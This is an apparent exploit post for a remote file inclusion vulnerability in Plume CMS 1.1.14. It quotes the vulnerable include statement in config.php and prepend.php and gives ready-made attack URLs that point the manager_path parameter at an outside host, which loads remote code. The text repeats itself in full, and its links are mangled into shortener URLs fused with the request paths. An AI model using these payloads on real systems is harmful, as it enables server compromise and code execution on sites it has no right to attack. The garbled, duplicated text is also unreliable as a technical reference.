Plume CMS 1.1.14 Released Remote Include Vulnerability
Script : https://tik.lat/rnxLg
Code : /config.php or /prepend.php
include $_PX_config[’manager_path’].’/conf/config.php’;
Exploit :
https://tik.lat/jpPLj [plume-path]/config.php?_PX_config[manager_path]=http://listpatch
https://tik.lat/vIBag [plume-path]/prepend.php?_PX_config[manager_path]=http://listpatch
Script : https://tik.lat/rnxLg
Code : /config.php or /prepend.php
include $_PX_config[’manager_path’].’/conf/config.php’;
Exploit :
https://tik.lat/jpPLj [plume-path]/config.php?_PX_config[manager_path]=http://listpatch
https://tik.lat/vIBag [plume-path]/prepend.php?_PX_config[manager_path]=http://listpatch